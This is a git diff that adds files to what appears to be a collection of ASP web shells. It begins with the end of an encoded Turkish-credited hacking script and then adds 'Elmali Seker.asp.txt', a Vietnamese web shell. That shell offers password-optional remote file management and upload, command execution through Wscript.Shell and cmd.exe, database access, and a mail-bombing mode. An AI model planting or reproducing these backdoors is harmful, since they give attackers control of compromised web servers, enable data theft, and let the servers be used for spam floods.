LJL[k.kxJLNr"b[JL^W9kxTxE[1W9kUo'ELhCkDrxT'E'SlkOr	o'JLr	Ln1Y8'JLk	%+1Yq[r[dC^Y'r'/mVYLE'k	LmOcxELkUL^YW[E'bxLn^D&xJLr	Ln1Y2[JE@*r@#@&x[Pb0@#@&M+/aGxk+R6s;/4@#@&@#@&Z)jAP* ,vHU/~	+/Unkk~3!s^lUısıR,n+M:bdkKx~oç:n~mNıxm~lDYığı:,8rD,l9lhNı. ,4;P	n/	+Ur	PWs[!ğEUE,EUmGMV6J,NUPNrx9kh ,bDmşOıD9ı:P	ns+MPHl2l.ıh,NrX~'*PrşOPoö.üU,xnV.,XCaıVm4k^kHGDsEş;y,ib~(Ex!UVmRP!n4Et,4zP3BG2]@#@&.+kwGUk+RA.bYnPr@!Dl8^+,hk9Y4xJrFT!uJE~1Vlkd'rJ3(.O:rJ@*@!OD~-mVro	xJrYG2rJ@*@!O9P^W^dalU{Jr JrPmskTxxJrmnUD+DrE@*r@#@&DC8VK&Z`E@!8@*_l^3bUo,hrO4Pjdr	o~HU	;KGKVkPFc!,8X,2BfAI~I*@!z(@*J*@#@&HC"/KVvJ@!0G.sPCmDrW	'vELsksnhlOtLEQ:G9+{c&EPsnY4W['aWdO@*@!4@*İUN6PIn.k,),@!&4@*@!bx2ED~xm:nxEtld4yB~YH2'vD+XYB,\msE'vJLsrsnlD4[rBPkr"+{*Z@*~`İU[6rx,j+M\n.9l3r~7k.Y!C^PzDb#J*@#@&zl./GVvJ@!r	wED~YHw+{.CNbW,xC:nxEtC/4*B,m4n13+[~7lsExEYn0B@*P@!(@*zOıVmmC3,5n.=P@!J8@*@!kxa;OP	ls+xB4CktfB,OXa+xvD+6Ov,\CV!n{B[0mEVDRmdwEPdk.+xXZ@*PvP+0P4b.~XDPel" *Jb@#@&zl./GsvJ@!rUaEOPDza+xMl9kW,xmh+{B4lkt*v,\l^;+{B:!sOkE@*,@!8@*\)U?~|KUEs)~@!J4@*@!r	w;Y,Um:n{B4l/4vE~YHwn'EYnaDBP7CV!+'E wB,/byn'XT@*PcHmd/,XC2ı^lmCV,NrybU*Jb@#@&HlykW^cJ@!4@*20VnU1+3,FVm/öD=~@!z(@*@!kUw;O,xC:xB4ld4lBPOza+xBDnXYv,\mVE'E4YDw[W1/wv,/k.n'y*@*,c33,|^ldöD~LbD[kkrP P~$}ŞP4ı.C0ıx~~,8bVhbXKD/mxı.bJ*@#@&XmyG.Dl`r@!k	wED~Uls+{B!öx[nM{3L|9+|Dv~7lV;n{Bel.[ıMPVKçEs:Pp#,8X,2BfAIv~DXwxBkE4srOBr#@#@&.+d2Kxd+cADbYn~r@!zO[@*@!&YM@*@!zOm4^+@*@!z6GDs@*E@#@&XC"KDYmcJ@!4@*n;sVmxısıP8X~3NNnD@!&4@*Jb@#@&Xl"dKVcJÖ	n1+sb3^+~,sU6P	+dx/r~0EV^CxslNmU~4bD,NG/zCHıPSPbdYxrsxPznM+~HU	;PU/	+/bPbs+,XCy9ıDısC	l4bsk	kXK. Pw?}P[+dOğk~W^hlHlU~(kD~dD-+M~9l~(k^+~,Dm4lDçl~4!PUnkx+,zlMNı:ı,rs+,k	Nn6~CDl8k^rDkkUr.RPFrsk~/.7+.^lMNlBPanDskdW	PnUT+VbU+,Yl0ısı.ıy,XmNCPVsköDü~kçbU+,or.:+zr.~~Xm[mPoUr,3E^VmUı:ı,3ıdıY^ıNı. ,4E	slMıPbŞt)FPbçk	P8E~U/U+HrP0EssmxNıh ,A;P	nkxn,şE,lx,VK^l^tG/DP-n,FOy~XDN~çCVışDıPklğsı3sı~ş3rV9nR,ŞE~C	PK3dDPdüDüsüU9+~9kH+4bVb.ksR~jsl.ıh,4E,8k.k:,2nDskkWUPxb,onç:~XKVs;sEy;~mX[ıx^CDıD~	+,N+M/bUk.Pl#*P;n4E+4E#@#@&Xm"dW^`r@!8@*rU9+aPHnDbPR@*@!z4@*$!DCXı,Wbyr0/VPH+MrPIbtHz5(H,?bn(1cPWMCzl,k	Nn6rUbyrx,-kMY;C^PXn.bxrPHC	k ,|!VVmx9ığıUıy,sjr,Nr"bxk	nPKVl	~FrgjtjHj~zmyıUPbUN6rU,XlUrcP$E,WkW~bVPlHxı,z+MNnPb/nS,Btm^3NR4OhVEPğ+.PCsDPVVmdöD9+~rk+PR@*,B R'4mmVbxTRtD:^v~,B R'R wcR-kC\kl3'AAh'tmmVkULctO:^v~Hl[C,-xnAk-4l1VbxLctD:V,ob8k,4nVbDOhxk.~oD+0 FW	EsEUE~8öHVnP(nVbDsns+xr",onDVbXGMR,BZ=-kd-k/wtmmVr	oR4O:^BPHC2Yığı	ıy9l~kşsnsPL+Mçn3^+şhn.yR ~@!4@*5z9zPdbyPÖ1AIİs~O@*PVE^VCU9ığıxıy,o?KPX!~r/D+9kğrx"r,XnD~/D-nMPNCVbP8kM~(lşVm/,/kD+HnP1W2XmVCOıMDı/mUıy,~PB~8E,/0nD~WkW~X!~W,/rOPüyn.bNU+	~çmVışOıMDıM/l	ıy,K2M:dkKx~ı~mş:ışPKsEM/E	;"PKPkkO+~rçbx @!J8@*r#@#@&HlydG^`E@!(@*zYısmmm3PH+M~O@*@*@!z(@*~PA|P(rD,t+9nWPbçk	R~A;.mXı[l, R'R w,ş+3sr	NnPbUDn0P(+VbDDh+	k"PT+.n0kXK.Rs+/sCPERc- Rw c-rx9n6cld2EP&~[byrx,CşmğıXC,k	+D,\~k	Nn6,k~CDlD,zl9lPE  -cR'R -AAS-rx9n6cld2EPPf~9k"k	~bxnMPShP9k.rxPLkM+.~BPk	[+XPk,COlMR,'bP8öz^+~rd)Hz|~"KDEU[mP P,E*@#@&Hl./W^`r@!4@*H)?UPFG	E:,~O@*@*@!J8@*P~jMNCPçGV^E~l^OP0VCdöMV+.n9+~k	[6~mYsl3,kçbUPT+skşDk.[b:R,vRc-Rcw R'B,ş+VVrU9+~lşmğıslMl~r	kx~-PPÜH,db+OVDk	PdİjYVnx9kğr~0Vlkö.P+P0C[lMPKVCx~vcRwB,rşlM+Or	kPCzmDslHıUcPh/Vl,&,[k.kUPmşlğı[C,k/~sUrPKsCx,E.lVVığıS~ER -c -cRwv,PXC"ı	Pz+DnMNrMP{#PcP@!8@*A3s+	+^n0P3^C/öMO@*@!&8@*,4!D[l~[m~~KÜs~/b+OsD+~LbDrşPHCaıV[ı0NmxPkW	.l0k~|^ldö.,lNı,SPs+/sCPEhShvPzC9l~B4OYaB~zmNl~vShADKGDB~,ob4kcJ*@#@&Hl"/KVcEg+NUP(öXV~[+M/xryS~t?	Z,Uk	PV;^VlUıhıBP[+kO3sk9ğkPş3bsP(öXs+9k. ,AkMCy,3l6C~3mDışDıDı^ıR~)sl~4UP9+Un9k:~LöMNühP{b,:nsx!xP0l^[ı:cP6PHüy[n	P4!~sUrP9C~XDbxrPCs9ıR~ŞE	[l	PnhbxkhVbPVE^smxıhı	ıP9+xX.+0Pöğ.+	Nrğr	ky9n~,/k.rUNPh2.:drKx~oçh+9+~-myonçr^:nybUby~KVmml0NıM~'*PnE4+;4r#@#@&zl.WDDCcJUwl^ks~DtCx0dPDW~@!(@*?^GMVn6@!&(@*~6WMPob\bUo,k[+mPC8KEY,\?qZP;GhwKxxOJb@#@&XCyK.Ym`E@!(@*ZG[bxLPL~G+-VKw:xD~[,bsoKDrO4:/,\l9+P(z~2xfAI@!z8@*r#@#@&@#@&Zz?3~W&Pv\U/PbşsxrHWMP'*@#@&Gx,+.DKD~./EsnP	+6D@#@&?Y,EOksd,'~?.\D /M+lOn}4%+1OvJ\U;RKKW^dJ*@#@&k6Pn.MP@!@*~!,YtU@#@&iW^:CNrcrHj; YKWsd,N+dOğk~XKVDE.,4!P/D7nDı	RE#@#@&nU9Pk6@#@&b0P4CdtWP{PEYnVrPOtU@#@&dGU,+D.GMP.+k;s+~	+XY@#@&d!Ok^/ nMW^nk/sK.:,tlk4f~,tm/4 @#@&ikWP.D,@!@*T,YtnU@#@&7dKssl[b`rAlşmDıkı"R,AnVbDOrğbxk.~\bDY!CsPalDt~VC.,NGğD!hE,+hr	PWs;	R~HU	;P[/D+ğk,\m.Pçü	3ü~/D-nMPıxcE#@#@&dsd+@#@&idGV[;vJ$lşm.Nı	ıy~I*PkşsnsPL+Mçn0VnşDkbRJ*@#@&7+	N~k6@#@&n^/+,@#@&KxP..WMPM+dEhn,xn6D@#@&U+O~6P'~oUr MOwWs9+M`sKV9nDhlOt*@#@&jYP6^P{P0cj;4wW^NnDd@#@&kWP.D@!@*T~Dt+U@#@&dGVsC9kcr4!P3^lkö.PPo?KPUnkx+krPbV+,OCDm:mPzl2ısm:ızWM PÖ	mn~K3EUhmVıSPkG	DC,HUZ,N-DXnPTk.nMRJ*@#@&xN,rW@#@&sKD~2C^4PWF,(x,0^@#@&dWU~D.WM~M+d!:Px6D@#@&i:n\0k~x,tlk4v30FcUC:_r-E_4CktX_r[+6l;sDRld2r@#@&d!ObVdcnMWm/koWM:~:\VrBPtmdty@#@&ihn\0k,'~tCd4vQ08 xm:nQr-JQ4m/4*3Ebx[6cl/aJ@#@&d!YrVkRK.Km+kdsKD:,hn\0kBP4ld4y@#@&dsn\0k~x,tld4+_WFcUm:n3J'J_4lk4*3J[+6l;sDRtDhJ@#@&d!OrVkRhDGmndksGDs~:\VrBPtCd4 @#@&ih\VbP{Ptm/4_6F xm:nQr-J34lkt*3Erx9+XR4Yhsr@#@&d!Ok^/ KMWmndksGDs~s+-0kBPtm/4+@#@&dh+73r~{Ptmdt+_08 Uls+3JwJQ4m/4*3E+NNn.ctYhsr@#@&d!ObVdcnMWm/koWM:~:\VrBPtmdtydd@#@&7:\0k~'~4m/4v3WFcxCh_JwE3tC/4X3Jr	N6R4YsE@#@&d;YbVd hDW1n/ksWMh~:\0kSP4Ckt+d@#@&db0~nMD@!@*T,Y4+	@#@&d./aWxk+cADbYnPr@!OC(V+,Ak9Yt{EEFZ!uJE@*@!OM@*@!Y9~m^ldd{JJV8MYhJr@*,J',tm/t+_6qR	lh+3JwE3tlk4*LJP@!WGxDP1WsW.x[s3Gz0c@*PHGKP)c~e"~@!6G	Y~1Vm//{JrVFrJ@*û@!J0GUD@*@!JON@*@!zD.@*@!JYm4s+@*E@#@&7+^d+@#@&7./wGUk+ hMrD+~r@!Dl4^+,Ak9Y4'rJqTZ]Jr@*@!DD@*@!O[P1Vm/d'EE04.YsEJ@*PE',tld4+_WFcUm:n3J'J_4lk4*LJ~@!6WUO,mW^GD{aZ+o/AA@*,rFPZZ,@!WW	OP1VCdk'JEV8JE@*ü@!&6WUD@*@!zY9@*@!&YM@*@!zDl8s@*J@#@&dxN,rW@#@&dM+dwGUk+ 0^;/4@#@&H6Y@#@&Hl"WMOm`E@!4@*İşV+sP:C:m:sl	Nı ~(XPA%NDPpb@!z(@*r#@#@&nU9Pr0@#@&@#@&Z)jAPc*~E(\S_P:n~^ıP9W/Hl,G3!:CR@#@&rW,kxNnmD P{~EW0J,Y4+U@#@&:n\0rP{P4Ckt @#@&Vd+@#@&s+-0k,'PwE^swmY4@#@&+U[,k0@#@&D/wKUd+chMkO+~E@!YC4^nPSk[O4'JEqZ!YJr~1VCk/{JJ04MO:rJ@*@!DD~-mVkTU'rJYK2EJ@*@!DN~mGskwCx{EJyJE~mVkLU{JEmUD+.rJ@*J@#@&Ym8VK&T`r@!8@*"+l9rxTPsbsn/,4HP;/rUTPpHduK:n~qc!P8z,2BfA],ib@!z(@*J*@#@&zl./GVvJ@!WKD:,CmDkW	xvJLsbVnnCO4[EgsGN'**EP:nO4W['aGkY@*@!k	wEDP	C:'vk	Ln^D B,-l^E+{vG3EPDX2+xv4k[NUB@*@!8@*GW/zC,b[DdbPl,@!J4@*@!k	2EDPUls+xv4l/4+B,YXanxBD+XYvP-C^En'EE[s+-Vb[Jv~kk"+{Z@*@!bxaEY,xmh+{BLWMEUO!V+|8X|2L|[m+|DEP-ls;'vR=~MöMüxOüsP) v,YzwxE/;(:bYB@*J*@#@&M+dwKxdnchDbO+,J@!JO[@*@!z6W.:@*@!JY.@*@!&Ym4sn@*J@#@&r6PUWD~bx%mD P{PrG3rPOtx@#@&HlykGVvJ@!(@*pHdC:KK@!&8@*P/Ws2W	+UO,kxr~0EsVmUslVDl9ıDR,3!sVmxıhıPçK3~VKVlH PU+D7n.P9l0k~kdONrğk	ry,NGdHlxıU~6k"k0dV~^k	3Pbxb~XmyCDm3~S,kçk	rPTöDüxDüsnX4bVrDdr	k"Rrb@#@&XC"kWVcE~k.PknM\nMPmPobD9rxby Pw?6~bV+,G3!:l,znY0k	k"PzG0P8kM~NbyrU9+~~Wm3CY,GMNC,NK/XmVm.Ps+-m!Y ~_KKh~üyDk	[nx,E^lşC4rsbXGD!dx!y~Wm3lO~k+.\.,kçr	NxPh2"\kk/rW	P[n	k+9~NbXWM ~W,ym:Cx~[bDn3,8EMNCU,0k"r0/nV,sbxV,k	kPHl.CDm3[l	P;smşıDııyc~A`1j,v^W	0bxLRCdaB~B1G:sWU m/wv~E/5VcCkwv,ob4k,NKdXmVCD9l~;HoE^CXmDl0~jpdP(lğslUOı^l.PHCNmP\9~PXn.^+.k	r,öğDn	+(kVbDb"R,CCYDl~)UwP0GN^lD,rçrx9+0k~b[hbx~şkMW+^+.r,ok8r,3.kDr0Pşr6DM+VD9nP9l4k^R~j5SPbULmkKOUPHlal^lVdmxı"NmSP:l8sKPVC.ı,~~3!s^lUışmx,/;^P0G:!VCDmNC~!Vlşm8k^kDkrUk.R,PE#@#@&Vd+@#@&D/2G	/+ AMkO+,E@!YnXYmD+mPkOX^+xBSk[O4)FZT]pt+bL4Y=cF!IB~@*r@#@&W	~+MDG.,D+d;s+~xaD@#@&U+DP+NN.P{Pj+M\n.cZDCYr4Nn^YvJtk^DGdK0ORo\S_KPKr#@#@&nNNnDc6a+U,JV2Kr~,4lkt+~,0Csk+@#@&nL9+Dcjnx9P@#@&r0~nMDx!,Otx@#@&"+/2G	/nRq.bYn,?D\DcuKtS3x1W[nv+L9nDcI+k2Gxk+:+aYb@#@&+s/@#@&M+d2Kx/n SDrY~r5C.Nığı	ıyPmNMn/,4;V!xChmNıPc~gQP4b.~3KxDDGV~zmw~4H~2xf3],i#E@#@&+UN,r6@#@&M+kwW	/ hMkO+,J@!&D+6DCDl@*r@#@&+	N,kW@#@&zmyGDDC`r@!8@*(XP3%9+.Ppb@!z8@*J*@#@&@#@&;)?AP**,B]nT+NbOP.ı:4ıMOıdıP{#,Ent;n4P8X,~P,P3~xPf~3,I~P,o,D~KPsPP,PU~l,.~?,l~F,RP;~W,H@#@&.n/aW	/nRA.bYnPr@!Ym4sn,hk[O4'EJ8TZ]ErP1Vlk/{EJ04.YsJE@*@!YD,-l^ko	xEJDWaJE@*@!O9P^W^dwmxxEr JE~mVro	xrJ^xD+DrJ@*E@#@&YC4^WfTvJ@!(@*IAM2GİP~Fc!,4zP3BG2]Ppb@!J4@*E*@#@&OC(VG&Zcr@!8M@*@!4@*"2Vr/D+.P^l.C,5b.hl,[PAVs+s+@!z8@*Eb@#@&zl.dW^`E@!6WDh~mmOkKU{BELsbV+hlD4[rghW9+x*lBPsnY4WN{2G/D@*@!kUw;O,xC:xBbx%n1Y v~7lsExEXC.B,YXa+{vtbN[+	B@*@!(@*H-3bz|z~),@!J4@*@!rUaEOP	C:'v4m/t+v,YzwxEYnXYEP\mV!n'EB~/bynxR*@*@!8D@*P`öMUn3=P_|JHwj}sPz]2'Hr^MW/GWD-jljjz|m;Wt#J*@#@&zl./GVvJ9nğDzjCV!+),@!rxaEDPUlhn{B4lk4&EP-C^E+xvEPOXan{BO6DB@*r#@#@&XmydW^`EPÜMzKH2+=P@!kns+1Y,xC:nxEtC/4*B@*@!G2DkWU~7lsEx8@*]AM|?}@!zK2YbWU@*@!W2ObWx,-l^E+{+@*IAM|f	r]9@!zGwDrW	@*@!GaYkGU,\CV!n{&@*"2V{A&1z]5@!zGwDkGU@*@!WaOkKxP7CsE'W@*]2!mA(Kbg9{U}@!&KwYrG	@*@!WaObWU,\mVE'l@*IAMmH`SP(|?}@!&WaYkKU@*@!J/VnmO@*,[U4k2iLx8dai[U8kwI[	8kwI,P@!kxaED~xm:n'E?C#Ub{nmZKHB,-CV!+{B Rll,5)}G(I,)l cBPOza+xBU;(:rDB@*J#@#@&Mn/aWU/RA.bY+,E@!JYN@*@!&0KDs@*@!zO.@*@!&Ym8V@*E@#@&Xl"dKVcJ@!Om4s@*@!YD@*@!D[@*"WGY,|nz,1lsn@!JYN@*@!ON@*|mDşısığı@!&O9@*@!zD.@*@!Y.@*@!YN@*un2e{;i"I3gK|j?AI@!&Y9@*@!Y9@*uF;j@!JON@*@!zD.@*@!DD@*@!ON@*un2e{d6ZzSm\zZC(HA@!&Y9@*@!Y[@*P_|StP@!&Y9@*@!zDD@*@!DD@*@!ON@*C|AemZdbU?3?m]}rP@!JON@*@!O[@*C|/]@!zON@*@!JY.@*@!DD@*@!Y9@*Cn2e{`?3]U@!zD[@*@!YN@*uF2I{`?3Ij~@!zON@*@!zDD@*@!DD@*@!O9@*u|Ae|Zi"IA1K|Z}Hs&M@!zDN@*@!DN@*_F2I{Z`]]2gK|Z61o(VP@!zD[@*@!zO.@*@!zOC(Vn@*rb@#@&zmykWVvJ"3M|?tP @*~jDDk	L`0+Vbhn#,z,I3Mm9qr]f,R@*,İxOnT+DcjmXıbPJ~"2!|A&1b"5,R@*,ArxmDz~JPIA!{A(nzH9{U},O@*P\;^YrPUODbxL~JPI3!|HiS:(|?t,O@*Pb+mzPUY.k	oEb@#@&DdwKx/ ADbYPE@!OC(VnPSrNDtxErF!TYrJ~m^Ck/xrJ04DD:rE@*@!Y.P7lsrTx'rEYKwJr@*@!Y9P1Ws/2C	'EJyEJ,lsrTx'EE1+UY.rJ@*r@#@&Yl(VKf!vJ@!4M@*@!8@*I+Tr/D+D,sCD9l	P6|i\zP'PUİJP(X~jm.?CFcZGH,I*@!&(@*r#@#@&Xm"/KVcJ@!0G.sPl1OkKx'EE'sbVnCY4'rghW9n'W*v~s+Y4G9'2WkO@*@!r	w!YP	lsn'EkULmO+EP\msE'BKV;B,YHwn'v4bN[+	v@*@!4@*\\3r&n+zP=~@!z8@*@!bxw!Y,Uls+xJrtCd4*Jr~YHw+{vO+XYEP-ls;'vB,dk.+x0l@*@!8.@*PcöD	n0)~_|dH-UrwPzI3-tk^.K/W6O-Ul.U)F{;Wt#E#@#@&Hl"WMOlvJ@!r	wEO~7lsExEWV!B,xls+{vtm/4vEPOza+'E.l9kWE~^tm0+[@*~6nj~P ~P@!kU2!YP-C^En'EdbVv,xm:+{B4C/4vvPDX2n{BDm[kKB@*,jİJPLx(/2i'U(/2iLU4kwI'	4/2I,P@!k	2!Y~	ls+'E?m#?z{F{;W\mEP\msE'Bc l),rnj&?İJ~=) RE~YHwnxE?E8hbYv@*rb@#@&./aWxk+cADbYnPr@!&O9@*@!JWWM:@*@!&OD@*@!JYC4sn@*J@#@&KUPD.GMPDnd!:nP	nXY@#@&?YPUljjlnPxPU+.-DR;.+mY+}8%+1YvJ	?^.bwORU4+^VEb@#@&drW,+.D,@!@*PT,Y4+x@#@&i7W^:CNb`EjD\.P9lPqj^DbwDRjCns^PVE^sl	ı:ıUC,İykU~7+.:h3ONbDR,İşVhP(lşCDıkıy ~Ul.UC|cZWtEb@#@&diDn/2G	/nRUNv#@#@&i+x[~b0@#@&bW,kUN+1Y ,',EXmyEPDtnU@#@&dKUPDDK.~D/!:nPUnXY@#@&ij+^+^O,Zldn,Z(xDc4ld4c*@#@&id;C/Pq@#@&d774l/41P{P?m#jlnR"+L.rD+~`:.ks`4Ckt bS,K.ksc4ld4&*~PrIA!{U}E#@#@&77;l/~ @#@&di74lktOPxPjCj?C|c]+T.rD+PcPMkh`4Ckt+*~,Zq	YvPDb:ctm/4f*#~,EIAM{G	6IGJ*@#@&d7/m/nP2@#@&id74m/t1~{Pjljjm| "+TDbY~`:Dr:vtCd4 #B~Z&xYvP.ks`4ldtfb*~~J"3M|A(HzI5Eb@#@&7d;Ck+~W@#@&dditmdtOPxPUl#jm|R"noqDkDn~`:Db:ctCd4 b~,PDb:c4m/tfbBPEIA!|2phbgf{U}rb@#@&d7Zm/n~l@#@&i7d4l/41~',?m.jlF "+LMrYPcPMk:c4m/4 *S,K.b:vtlkt2b~,J]2V{\idKq|j}r#@#@&73x9PU+s+^O@#@&7k6~+MD~@!@*P!~O4+U@#@&7iWssl9k`rİşVhP,onDç3snşDkDbs+s+Nb ~.zS`2~NnğnMkUk	~NKğD;~7+P;zTEUPjC^En,obDk9ğk	"k9+UP:rU,WVcE#@#@&dsd+@#@&idGV[;vJ~@!(@*J3tCd4 _E@!J4@*@!(.@*PC9D/k	+,.+TkdYD~zmyıV9ı Pr#@#@&7nx9Pb0@#@&@#@&Vd+,r0,kU%mY+~{PEW0;rPO4+	@#@&ik6~tm/4v,'~EK3Er~Y4+x@#@&7dHl.W.YCcrHn\0rzn+zl,@!4@*ELK.ksc4ld4**[J@!z(@*J*@#@&diWU~DDK.PM+/!hnP	+XY@#@&77M+dwKU/RA.bY+~E@!mnxDnM@*9ğ+Mz.mV!n),@!8@*r@#@&7iD+k2W	/+cA.kD+,?C.jCnR]+T]+mN~c:Dkhc4ldtlb*@#@&idM+/aW	d+ch.kD+~E@!z4@*@!z1+xDn.@*r@#@&d7kW~D.@!@*TPDtnU@#@&d77KVhl9rvJFmXıDPIobdYD~VmD[C,4E^;xm:l9ı  Rr#@#@&7dnU9Pr0i7@#@&dnsk+PrW,tC/4,'~r/bVJ,Y4nx@#@&7dHl"GMYlvEH\3b&F+H),@!8@*E':Dr:v4lktXbLJ@!&8@*Jb@#@&7iWU,+MDWMPMn/!:nP	+aO@#@&di4lkt,,x~?m.UlFR]nTfnVO+,`P.b:`4CktX#*@#@&d7b0,+DM@!@*TPDtnx@#@&77iWVsCNb`J"nLkkYDsl.[mx~?bsk	+hn9kR~FAX~XmU^ışPG^l(kVbDc~XmNCP0lzıO,4E^Cxm:l9ı E#@#@&idnVdn@#@&7diGV9EcE~lşl.ız^l~?bsbx[bR,J#@#@&i7+	N~k6@#@&7xN,r0,@#@&inUN,k6@#@&@#@&n	N~k6@#@&x[~b0@#@&zmyGDDCm`E@!4@*DbYDnx,4zPA993"P0K.PUl.UCFR;Wt@!&4@*E*@#@&@#@&@#@&A19~U2S3/:@#@&@#@&@#@&kW,wKwEaP{~smVd+,bH9,xW^r/DP',oCVk+,Y4+U@#@&Dn/aGxk+ AMkYn~r@!8D@*@!(D@*r@#@&D+kwKU/RADbYn~r@!Nb-P,/YHsn'rJ.Orx[nX)q*ZIPaWdrDkWUlm4dW^;D+Er@*r@#@&;l^sPnVC/KD6V!`#@#@&D/wKUd+chMkO+~E@!z[k7@*@!9k-~,lVrL	'EJMrTtOrJ@*J@#@&ZmsV,fG/Hl6V!`#@#@&D/wKUd+chMkO+~E@!z[k7@*J@#@&nU9PkW@#@&@#@&k6~aW2!w,'Pwl^d+,Y4+	@#@&./wKU/RhMrO+,J@!4.@*@!8M@*@!mUYD@*@!Dl4sn,mnV^2mN[bxT'Jr!rEP1+sVkwC^bxo{EJZJJ,ArNDt{JEFTrJ@*J@#@&D/2G	/+ AMkO+,E@!Y.@*@!DNP1Vmd/{JE3(DOhrJP4nkTtY{EE ZJrPdYzs'EJ(Cm0o.G!xNR^KVGD=qyF+8 rJPmVbLx{JEmxOnMJJ@*@!4@*?üDü1üsnD@!z(@*@!zO[@*@!&YM@*J@#@&/C^VPj;ME^E^nM@#@&M+kwW	/ hMkO+,J@!&Dl4^n@*@!zmUO+M@*@!4.@*@!8M@*E@#@&/l^V~j!DE^;&xWW@#@&Hl"KDDllvJ@!8@*qDrYD+U~(XP@!CP4D+6xEJslbVOWlnNNnD@$dl7/CVcmWhEr@*39G3"@!&m@*,sWMP@!CP4Dn0{JE4DYw=&zShhcdC\kl0R^WhErPOlML+D'm8^lxVEr@*	hq Ul#UlnRZKH@!&l@*@!&4@*Jb@#@&Xl.GDDl`r@!8@*:+swslOn,[~Khl,fndboxn[,4zP@!C,t.0{JJslbsYK)WlkY8GH@$/m-/m3R1GhJr@*wbjK$6I@!&l@*@!4M@*j2lmrC^PPtmU0/~DW,slkY(GX@!z8@*r#@#@&xN,r0@#@&g5iqAA==^#~@%>
+<!--EFSO Ejder &  Fastboy tarafından yazılmıştır for SaVSaK.CoM . TÜM HAKLARI Ejder e Aitttir.-->
+<!--TÜM HAKLARI SAKLIDIR.. KODLARDA yapacağınmız bir değişiklik KODun Çalışmamasına mal olur. Bundan dolayı Bir sorun çıkarsa EJDER & SaVSAK.CoM Sorunlu değildir..-->
+<!--Bu yazılımda geliştilmiş tüm herşey , mantık, algoritma, yazılımlar Sıfırdan Ejder tarafından yazılmıştır. TEMA , düzen vede Görünüm Fastboy a Aittir. -->
+<!-- TAKLİTLEİRNDEN KAÇININ. by EJDER-->
+
+<!--Ejder was HERE-->
+<%#@~^BgAAAA==vL[DMQIAAA==^#~@%><p align="right">&nbsp;</p>
+
diff --git a/138shell/E/Elmali Seker.asp.txt b/138shell/E/Elmali Seker.asp.txt
new file mode 100644
index 0000000..26765f8
--- /dev/null
+++ b/138shell/E/Elmali Seker.asp.txt	
@@ -0,0 +1,2324 @@
+<%
+
+' Tac gia: forever5pi (theo huong dan cua anh vicki-vkdt)
+' Email : forever5pi@yahoo.com
+' Website: http://vnhacker.org
+
+option explicit
+
+Server.ScriptTimeout=10000
+Response.Buffer=false
+
+dim gURL,gMsg
+dim targetPath,cp_dst,mv_dst,root
+dim FSO,re
+dim zombie_array,special_array
+
+' ###################################### CONFIGURATION ######################################
+
+const gPassword="" ' mat khau ("" : khong dung password)
+
+const gMax=50 ' chieu dai toi da cho ten file
+const gBomb=1000 ' so luong mail mac dinh can bomb
+
+const lnkExt="lnk,url"
+const editExt="htm,html,asp,asa,txt,inc,css,aspx,js,vbs,shtm,shtml,xml,xsl,log,ini,bat,bak" ' danh sach cac file cho phep edit
+
+const TmpDir="C:\" ' thu muc tam thoi mac dinh
+const Shell="cmd.exe" ' shell mac dinh
+
+' cac chuoi ket noi mac dinh
+const cstrMSSQL = "Provider=SQLOLEDB;Data Source=SERVER_NAME;database=DB_NAME;uid=UID;pwd=PWD"
+const cstrJET = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=full_path/db_file.mdb" 
+const cstrACCESS = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=full_path/db_file.mdb"
+const cstrORACLE = "Provider=OraOLEDB.Oracle.1; Data Source=DB_NAME; User ID=UID; Password=PWD"
+const cstrMYSQL = "Driver=MySQL;server=SERVER_IP;uid=UID;pwd=PWD;database=DB_NAME"
+const cstrDSN = "DSN_NAME"
+
+const bSize=false' co/khong hien folder-size
+
+const charset="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-" ' tap ki thu dung de sinh chuoi ngau nhien
+
+zombie_array=array("com","net","org","info","vn","cn") ' mang cac domain z0mbie
+special_array=array("yahoo.com","hotmail.com") ' mang cac domain dac biet (dung trong bomb mail)
+
+root=Server.MapPath(".") ' folder mac dinh
+
+' ###########################################################################################
+
+gURL=Request.ServerVariables("SCRIPT_NAME")
+Init()
+if (LCase(Left(Request.ServerVariables("HTTP_CONTENT_TYPE"),19))="multipart/form-data") and (Session("allow")=1) and (Session("mode")=0) then Upload()
+Secure()
+if Request.Form("command")="Logout" then Logout()
+if Request.Form("command")="ChangeMode" then
+Session("mode")=Request.Form("mode")
+Session("switch")=true
+end if
+select case Session("mode")
+case 0 myFile()
+case 1 myCMD()
+case 2 mySQL()
+case 3 myMail()
+end select
+
+'###########################################################################################
+
+sub myFile()
+if Session("switch")=true then
+targetPath=Session("targetPath")
+if targetPath="" then targetPath=root
+Session("switch")=false
+else
+targetPath=Trim(Request.Form("folder"))
+if targetPath="" then targetPath=root else targetPath=abspath(targetPath)
+
+select case Request.Form("command")
+case "Download"
+Download()
+exit sub
+case "Edit"
+Editor()
+exit sub
+case "ChangeAttributesFile","ChangeAttributesFolder"
+ChangeAttributesItem()
+exit sub
+case "Tree"
+Tree()
+exit sub
+case "Delete" Delete()
+case "Move" Move()
+case "Copy" Copy()
+case "ZipInfo" ZipInfo()
+case "NewFile","NewFolder" CreateItem()
+case "RenameFile","RenameFolder" RenameItem()
+case "OpenFolder" OpenFolder()
+case "LevelUp" targetPath=FSO.GetParentFolderName(abspath(Request.Form("folder")))
+case "LevelRoot" targetPath=findroot(abspath(Request.Form("folder")))
+end select
+
+Session("targetPath")=targetPath
+end if
+
+HtmlHeader("")
+HtmlMode()
+List()
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub myCMD()
+dim bDoIt
+dim bEcho
+dim szTmpDir,szShell,szCmd,szTmpFile
+dim oScript,oScriptNet,oFile
+
+HtmlHeader("")
+HtmlMode()
+
+set oScript=Server.CreateObject("Wscript.Shell")
+set oScriptNet=Server.CreateObject("Wscript.Network")
+
+szTmpDir=Trim(Request.Form("tmpdir"))
+szShell=Trim(Request.Form("shell"))
+szCmd=Trim(Request.Form("cmd"))
+bEcho=CBool(Request.Form("echo"))
+
+if Session("switch")=true then
+Session("switch")=false
+bDoit=false
+szTmpDir=Session("szTmpDir")
+szShell=Session("szShell")
+szCmd=Session("szCmd")
+bEcho=Session("bEcho")
+else
+bDoIt=true
+end if
+
+if szTmpDir="" then szTmpDir=TmpDir else szTmpDir=abspath(szTmpDir)
+if szShell="" then szShell=Shell
+
+Session("szTmpDir")=szTmpDir
+Session("szShell")=szShell
+Session("szCmd")=szCmd
+Session("bEcho")=bEcho
+
+%>
